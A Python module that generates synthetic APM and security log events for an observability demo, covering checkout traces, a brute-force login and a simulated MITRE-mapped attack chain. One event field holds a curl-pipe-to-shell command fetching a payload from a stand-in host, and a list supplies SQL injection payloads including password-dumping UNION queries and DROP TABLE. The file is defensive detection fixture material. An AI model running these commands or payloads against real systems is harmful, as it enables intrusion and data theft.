"""Octo APM demo synthetic event batches."""

import random

from testlogs.common import *  # noqa: F401,F403
from testlogs.application_core import application_event


def _apm_demo_application_events():
    events = []
    brute_force_ip = "194.5.249.7"

    # Octo APM demo: one service-scoped dataset that carries correlated logs,
    # APM span hierarchy, and metric samples for the dedicated APM dashboard.
    checkout_trace = "trace_octo_apm_checkout_001"
    checkout_root_span = "span_octo_checkout_root"
    events.extend([
        application_event(
            "octo-apm-demo",
            message="checkout request accepted",
            url="/octo/checkout",
            http_method="POST",
            status_code="200",
            response_time_ms=1180,
            trace_id=checkout_trace,
            span_id=checkout_root_span,
            parent_span_id="",
            span_name="HTTP POST /octo/checkout",
            span_attributes="route=/octo/checkout cart.items=3 customer.tier=gold",
            workflow_id="checkout",
            workflow_step="entry",
            metric_name="http.server.duration",
            metric_value="1180",
            metric_unit="ms",
            hostname="octo-apm-demo-frontend-01",
            offset=100,
        ),
        application_event(
            "octo-apm-demo",
            message="inventory reservation span completed",
            url="/octo/internal/inventory/reserve",
            http_method="POST",
            status_code="200",
            response_time_ms=420,
            trace_id=checkout_trace,
            span_id="span_octo_inventory_reserve",
            parent_span_id=checkout_root_span,
            span_name="POST /inventory/reserve",
            span_attributes="component=inventory sku=OCTO-DRONE-7 reservation=ok",
            db_target="oracle_atp",
            db_statement="update inventory set reserved = reserved + :qty where sku = :sku",
            db_elapsed_ms=420,
            workflow_id="checkout",
            workflow_step="inventory",
            metric_name="apm.span.duration",
            metric_value="420",
            metric_unit="ms",
            hostname="octo-apm-demo-api-01",
            offset=101,
        ),
        application_event(
            "octo-apm-demo",
            message="payment authorization timeout",
            level="ERROR",
            url="/octo/internal/payment/authorize",
            http_method="POST",
            status_code="504",
            response_time_ms=2860,
            trace_id=checkout_trace,
            span_id="span_octo_payment_auth",
            parent_span_id=checkout_root_span,
            span_name="POST /payment/authorize",
            span_attributes="component=payment gateway=demo-pay timeout=true",
            error_type="PaymentGatewayTimeout",
            slow_request=True,
            workflow_id="checkout",
            workflow_step="payment",
            java_apm_path="/api/java-apm/payment/authorize",
            java_apm_status_code=504,
            java_apm_latency_ms=2860,
            java_apm_error_type="PaymentGatewayTimeout",
            metric_name="apm.service.errors",
            metric_value="1",
            metric_unit="count",
            hostname="octo-apm-demo-api-02",
            offset=102,
        ),
        application_event(
            "octo-apm-demo",
            message="checkout rollback wrote audit entry",
            level="WARN",
            url="/octo/internal/audit/checkout-rollback",
            http_method="POST",
            status_code="200",
            response_time_ms=310,
            trace_id=checkout_trace,
            span_id="span_octo_checkout_rollback",
            parent_span_id="span_octo_payment_auth",
            span_name="INSERT checkout_rollback_audit",
            span_attributes="db.statement=insert rollback_reason=payment_timeout",
            db_target="oracle_atp",
            db_statement="insert into checkout_rollback_audit(trace_id, rollback_reason) values(:trace_id, :reason)",
            db_elapsed_ms=310,
            workflow_id="checkout",
            workflow_step="audit",
            metric_name="apm.db.calls",
            metric_value="1",
            metric_unit="count",
            hostname="octo-apm-demo-db-client-01",
            offset=103,
        ),
        application_event(
            "octo-drone-shop",
            message="java app-server sidecar payment authorization failed",
            level="ERROR",
            url="/api/orders/checkout",
            http_method="POST",
            status_code="504",
            response_time_ms=2910,
            trace_id=checkout_trace,
            span_id="span_octo_java_payment_sidecar",
            parent_span_id="span_octo_payment_auth",
            span_name="POST octo-java-app-server /api/java-apm/payment/authorize",
            span_attributes="peer.service=octo-java-app-server app_server=spring-boot-embedded-tomcat",
            error_type="PaymentGatewayTimeout",
            slow_request=True,
            workflow_id="checkout",
            workflow_step="java-payment",
            java_apm_path="/api/java-apm/payment/authorize",
            java_apm_status_code=504,
            java_apm_latency_ms=2860,
            java_apm_error_type="PaymentGatewayTimeout",
            hostname="octo-drone-shop-frontend-01",
            offset=104,
        ),
    ])

    attack_trace = "trace_octo_apm_attack_001"
    attack_run_id = "run-octo-attack-lab-001"
    attack_request_id = "req_octo_attack_001"
    attack_source_ip = "203.0.113.77"
    attack_redirect_url = "https://pay-update.example.test/checkout/session"
    attack_stages = [
        {
            "service": "octo-drone-shop",
            "message": "OCI API Gateway route policy evaluated the attack-lab request before backend forwarding",
            "level": "WARN",
            "stage": "api_gateway_edge_control",
            "tactic": "Initial Access",
            "technique_id": "T1190",
            "technique": "Exploit Public-Facing Application",
            "type": "api_gateway_policy_detection",
            "severity": "high",
            "url": "/api/shop/attack/simulate",
            "status": "200",
            "span": "span_octo_attack_api_gateway_edge",
            "parent": "",
            "host": "oci-api-gateway-public",
            "role": "public-api-gateway",
            "instance": "<DEMO_ATTACK_API_GATEWAY_DEPLOYMENT_OCID>",
            "destination_ip": "198.51.100.165",
            "destination_port": 443,
            "lotl": "api-gateway-policy",
            "osquery_query": "api-gateway-route-policy",
            "osquery_finding": "API Gateway policy and quota telemetry correlated with the same attack id and trace",
            "compromised": False,
            "oci.api_gateway.name": "octo-public-api-gateway",
            "oci.api_gateway.scope": "public",
            "oci.api_gateway.deployment_id": "<DEMO_ATTACK_API_GATEWAY_DEPLOYMENT_OCID>",
            "oci.api_gateway.route": "/api/shop/attack/simulate",
            "oci.api_gateway.route_id": "public-attack-simulate",
            "oci.api_gateway.route_family": "shop_attack",
            "oci.api_gateway.request_id": "gw-req_octo_attack_001",
            "oci.api_gateway.action": "allow",
            "oci.api_gateway.policy.decision": "suspicious_burst_observed",
            "oci.api_gateway.latency_ms": 34,
            "oci.api_gateway.rate_limit.limit": 120,
            "oci.api_gateway.rate_limit.remaining": 87,
            "oci.api_gateway.threat_signal": "attack_lab_probe",
        },
        {
            "service": "octo-drone-shop",
            "message": "Attack lab initial access reached the shop edge route",
            "level": "WARN",
            "stage": "initial_access",
            "tactic": "Initial Access",
            "technique_id": "T1190",
            "technique": "Exploit Public-Facing Application",
            "type": "public_app_exploit",
            "severity": "high",
            "url": "/shop/products",
            "status": "200",
            "span": "span_octo_attack_initial_access",
            "parent": "",
            "host": "octo-shop-vm-01",
            "role": "shop-frontend",
            "instance": "<DEMO_ATTACK_SHOP_INSTANCE_OCID>",
            "destination_ip": "203.0.113.10",
            "destination_port": 443,
            "lotl": "curl",
            "osquery_query": "unexpected-listeners",
            "osquery_finding": "public endpoint probe reached shop listener through the load balancer",
            "compromised": False,
        },
        {
            "service": "octo-drone-shop",
            "message": "Compromised VM executed a shell-like payload from the app tier",
            "level": "ERROR",
            "stage": "vm_compromise",
            "tactic": "Execution",
            "technique_id": "T1059",
            "technique": "Command and Scripting Interpreter",
            "type": "compromised_vm",
            "severity": "critical",
            "url": "/api/shop/attack/simulate",
            "status": "500",
            "span": "span_octo_attack_vm_compromise",
            "parent": "span_octo_attack_initial_access",
            "host": "octo-shop-vm-01",
            "role": "shop-frontend",
            "instance": "<DEMO_ATTACK_SHOP_INSTANCE_OCID>",
            "destination_ip": "198.51.100.165",
            "destination_port": 8080,
            "lotl": "bash",
            "process.name": "bash",
            "process.command_line": "bash -lc curl -fsS https://pay-update.example.test/payload.sh | sh",
            "osquery_query": "lotl-processes",
            "osquery_finding": "shell-like process launched from the application host during the lab run",
            "compromised": True,
        },
        {
            "service": "octo-apm-demo",
            "message": "Payment form interception detected during checkout",
            "level": "ERROR",
            "stage": "payment_interception",
            "tactic": "Credential Access",
            "technique_id": "T1056.001",
            "technique": "Keylogging",
            "type": "payment_data_interception",
            "severity": "critical",
            "url": "/shop/checkout/payment",
            "status": "200",
            "span": "span_octo_attack_payment_interception",
            "parent": "span_octo_attack_vm_compromise",
            "host": "octo-shop-vm-01",
            "role": "shop-frontend",
            "instance": "<DEMO_ATTACK_SHOP_INSTANCE_OCID>",
            "destination_ip": "198.51.100.165",
            "destination_port": 443,
            "lotl": "javascript",
            "osquery_query": "recent-processes",
            "osquery_finding": "checkout form overlay produced payment interception telemetry",
            "compromised": True,
            "payment.interception.detected": True,
            "payment.provider": "simulated",
            "payment.status": "intercepted",
            "payment.card_brand": "visa",
            "payment.card_last4": "4242",
            "payment.risk_score": 97,
        },
        {
            "service": "octo-apm-demo",
            "message": "Suspicious payment redirect sent checkout traffic to an untrusted host",
            "level": "ERROR",
            "stage": "payment_redirect",
            "tactic": "Credential Access",
            "technique_id": "T1557",
            "technique": "Adversary-in-the-Middle",
            "type": "payment_redirect",
            "severity": "critical",
            "url": "/shop/checkout/payment/redirect",
            "status": "302",
            "span": "span_octo_attack_payment_redirect",
            "parent": "span_octo_attack_payment_interception",
            "host": "octo-shop-vm-01",
            "role": "shop-frontend",
            "instance": "<DEMO_ATTACK_SHOP_INSTANCE_OCID>",
            "destination_ip": "198.51.100.44",
            "destination_port": 443,
            "lotl": "nginx-rewrite",
            "osquery_query": "suspicious-shell-history",
            "osquery_finding": "redirect rule simulation points payment flow to a suspicious host",
            "compromised": True,
            "payment.redirect.detected": True,
            "payment.redirect.url": attack_redirect_url,
            "http.redirect.location": attack_redirect_url,
        },
        {
            "service": "enterprise-crm-portal",
            "message": "Compromised shop path pivoted toward the CRM admin service",
            "level": "WARN",
            "stage": "crm_pivot",
            "tactic": "Lateral Movement",
            "technique_id": "T1021.004",
            "technique": "Remote Services: SSH",
            "type": "crm_pivot",
            "severity": "high",
            "url": "/api/admin/orders",
            "status": "401",
            "span": "span_octo_attack_crm_pivot",
            "parent": "span_octo_attack_payment_redirect",
            "host": "octo-crm-vm-01",
            "role": "crm-admin",
            "instance": "<DEMO_ATTACK_CRM_INSTANCE_OCID>",
            "destination_ip": "198.51.100.122",
            "destination_port": 8080,
            "lotl": "curl",
            "osquery_query": "lotl-processes",
            "osquery_finding": "CRM host observed suspicious admin API probing from the compromised app tier",
            "compromised": True,
        },
        {
            "service": "octo-apm-demo",
            "message": "Payment telemetry exfiltration attempt correlated with checkout redirect",
            "level": "ERROR",
            "stage": "exfiltration",
            "tactic": "Exfiltration",
            "technique_id": "T1041",
            "technique": "Exfiltration Over C2 Channel",
            "type": "payment_exfiltration",
            "severity": "critical",
            "url": "/shop/checkout/payment/callback",
            "status": "503",
            "span": "span_octo_attack_exfiltration",
            "parent": "span_octo_attack_payment_redirect",
            "host": "octo-shop-vm-01",
            "role": "shop-frontend",
            "instance": "<DEMO_ATTACK_SHOP_INSTANCE_OCID>",
            "destination_ip": "198.51.100.200",
            "destination_port": 443,
            "lotl": "curl",
            "osquery_query": "process-open-sockets",
            "osquery_finding": "outbound callback to suspicious payment collection endpoint",
            "compromised": True,
            "payment.interception.detected": True,
            "payment.redirect.detected": True,
            "payment.card_last4": "4242",
            "network.bytes_out": 4812,
        },
    ]
    for offset, stage in enumerate(attack_stages, start=105):
        base_event = application_event(
            stage["service"],
            message=stage["message"],
            level=stage["level"],
            url=stage["url"],
            http_method="POST" if stage["stage"] != "initial_access" else "GET",
            status_code=stage["status"],
            response_time_ms=900 + (offset - 105) * 240,
            client_ip=attack_source_ip,
            user_agent="curl/8.4.0 octo-attack-lab",
            trace_id=attack_trace,
            span_id=stage["span"],
            parent_span_id=stage["parent"],
            span_name=f"security.attack.{stage['stage']}",
            span_attributes=f"attack.id=attack-octo-demo-001 mitre={stage['technique_id']}",
            error_type=stage["type"] if stage["level"] == "ERROR" else None,
            slow_request=stage["level"] == "ERROR",
            workflow_id="admin-threat-simulation",
            workflow_step=stage["stage"],
            request_id=attack_request_id,
            run_id=attack_run_id,
            hostname=stage["host"],
            offset=offset,
        )
        events.append({
            **base_event,
            "security.attack.id": "attack-octo-demo-001",
            "security.attack.stage": stage["stage"],
            "security.attack.type": stage["type"],
            "security.attack.detected": True,
            "security.severity": stage["severity"],
            "mitre.tactic": stage["tactic"],
            "mitre.technique_id": stage["technique_id"],
            "mitre.technique": stage["technique"],
            "attack.entry_point": stage["url"],
            "attack.lotl_binary": stage["lotl"],
            "source.ip": attack_source_ip,
            "server.address": stage["host"],
            "destination.ip": stage["destination_ip"],
            "destination.port": stage["destination_port"],
            "network.protocol.name": "https" if stage["destination_port"] == 443 else "http",
            "osquery.query": stage["osquery_query"],
            "osquery.finding": stage["osquery_finding"],
            "osquery.sql": "SELECT pid, name, path, cmdline FROM processes WHERE start_time > strftime('%s','now','-30 minutes');",
            "osquery.result_count": 1,
            "cloud.instance.id": stage["instance"],
            "host.name": stage["host"],
            "host.role": stage["role"],
            "vm.compromised": stage["compromised"],
            **{key: value for key, value in stage.items() if "." in key},
        })

    login_trace = "trace_octo_apm_login_001"
    login_root_span = "span_octo_login_root"
    events.extend([
        application_event(
            "octo-apm-demo",
            message="login request completed",
            url="/octo/login",
            http_method="POST",
            status_code="401",
            response_time_ms=640,
            client_ip=brute_force_ip,
            user_agent="Mozilla/5.0 (compatible; Hydra/9.0)",
            user="octo-admin",
            trace_id=login_trace,
            span_id=login_root_span,
            span_name="HTTP POST /octo/login",
            span_attributes="auth.result=failed mfa.required=true",
            attack_type="broken_auth",
            attack_severity="high",
            workflow_id="auth",
            workflow_step="login",
            metric_name="http.server.requests",
            metric_value="1",
            metric_unit="count",
            hostname="octo-apm-demo-frontend-01",
            offset=105,
        ),
        application_event(
            "octo-apm-demo",
            message="credential lookup span completed",
            url="/octo/internal/auth/credentials",
            http_method="POST",
            status_code="200",
            response_time_ms=390,
            client_ip=brute_force_ip,
            user="octo-admin",
            trace_id=login_trace,
            span_id="span_octo_auth_db_lookup",
            parent_span_id=login_root_span,
            span_name="SELECT users by username",
            span_attributes="db.statement=select users username=octo-admin",
            db_target="oracle_atp",
            db_statement="select id, password_hash from users where username = :username",
            db_elapsed_ms=390,
            workflow_id="auth",
            workflow_step="credentials",
            metric_name="apm.db.duration",
            metric_value="390",
            metric_unit="ms",
            hostname="octo-apm-demo-db-client-01",
            offset=106,
        ),
        application_event(
            "octo-apm-demo",
            message="APM metric sample p95 latency",
            url="/octo/metrics",
            status_code="200",
            response_time_ms=20,
            trace_id="trace_octo_apm_metric_001",
            span_id="span_octo_metric_p95",
            span_kind="METRIC",
            span_name="metric http.server.duration.p95",
            span_attributes="metric.window=5m route=/octo/checkout",
            workflow_id="observability",
            workflow_step="metrics",
            metric_name="http.server.duration.p95",
            metric_value="2860",
            metric_unit="ms",
            hostname="octo-apm-demo-metrics-01",
            offset=107,
        ),
        application_event(
            "octo-apm-demo",
            message="APM metric sample error count",
            url="/octo/metrics",
            status_code="200",
            response_time_ms=18,
            trace_id="trace_octo_apm_metric_002",
            span_id="span_octo_metric_errors",
            span_kind="METRIC",
            span_name="metric apm.service.errors",
            span_attributes="metric.window=5m route=/octo/checkout",
            workflow_id="observability",
            workflow_step="metrics",
            metric_name="apm.service.errors",
            metric_value="1",
            metric_unit="count",
            hostname="octo-apm-demo-metrics-01",
            offset=108,
        ),
    ])

    # ═══════════════════════════════════════════════════════════════
    #  APM SQL Injection Attack in Request (T1190) — SOC Application Logs
    # ═══════════════════════════════════════════════════════════════
    apm_sqli_payloads = [
        ("enterprise-crm-portal", "/crm/api/customers?search=1' OR 1=1--", "401", 41),
        ("enterprise-crm-portal", "/crm/api/customers?search=' OR '1'='1", "401", 45),
        ("enterprise-crm-portal", "/crm/api/orders?status=pending' UNION SELECT username,password,1,2,3,4,5 FROM users--", "500", 320),
        ("octo-drone-shop", "/shop/api/products?cat=1 UNION%20SELECT%20password,email%20FROM%20customers--", "500", 280),
        ("octo-drone-shop", "/shop/api/products?id=2'%20OR%201%3D1--", "200", 95),
        ("enterprise-crm-portal", "/crm/api/reports?id=1' AND SLEEP(5)--", "504", 5050),
        ("enterprise-crm-portal", "/crm/api/reports?id=1' OR (SELECT COUNT(*) FROM users)>0--", "200", 130),
        ("octo-drone-shop", "/shop/search?q=' UNION SELECT NULL,table_name FROM INFORMATION_SCHEMA.TABLES--", "500", 410),
        ("enterprise-crm-portal", "/crm/login?user=admin'--&pass=anything", "302", 80),
        ("octo-drone-shop", "/shop/api/orders?ref=1; DROP TABLE sessions", "500", 65),
        ("enterprise-crm-portal", "/crm/api/customers?filter=' OR 1=1 LIMIT 1 OFFSET 0--", "200", 110),
        ("octo-drone-shop", "/shop/api/products?id=1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--", "500", 240),
    ]
    for i, (svc, url, status, latency) in enumerate(apm_sqli_payloads):
        events.append(application_event(
            svc,
            message="SQL injection attack detected in request",
            level="WARN" if status.startswith("2") else "ERROR",
            url=url,
            http_method="GET",
            status_code=status,
            response_time_ms=latency,
            client_ip=random.choice(SUSPICIOUS_IPS),
            user_agent=random.choice(["sqlmap/1.7", "Mozilla/5.0 (compatible; Nuclei)", "Mozilla/5.0 (X11; Linux x86_64)"]),
            attack_type="sql_injection",
            attack_severity="critical",
            waf_score=92 + (i % 8),
            span_attributes=f"attack.type=sql_injection mitre.technique=T1190 owasp.category=A03_Injection attack.payload_len={len(url)}",
            workflow_id="threat-detection",
            workflow_step="apm-sqli",
            trace_id=f"trace_apm_sqli_{i:02d}",
            offset=150 + i,
        ))


    return events
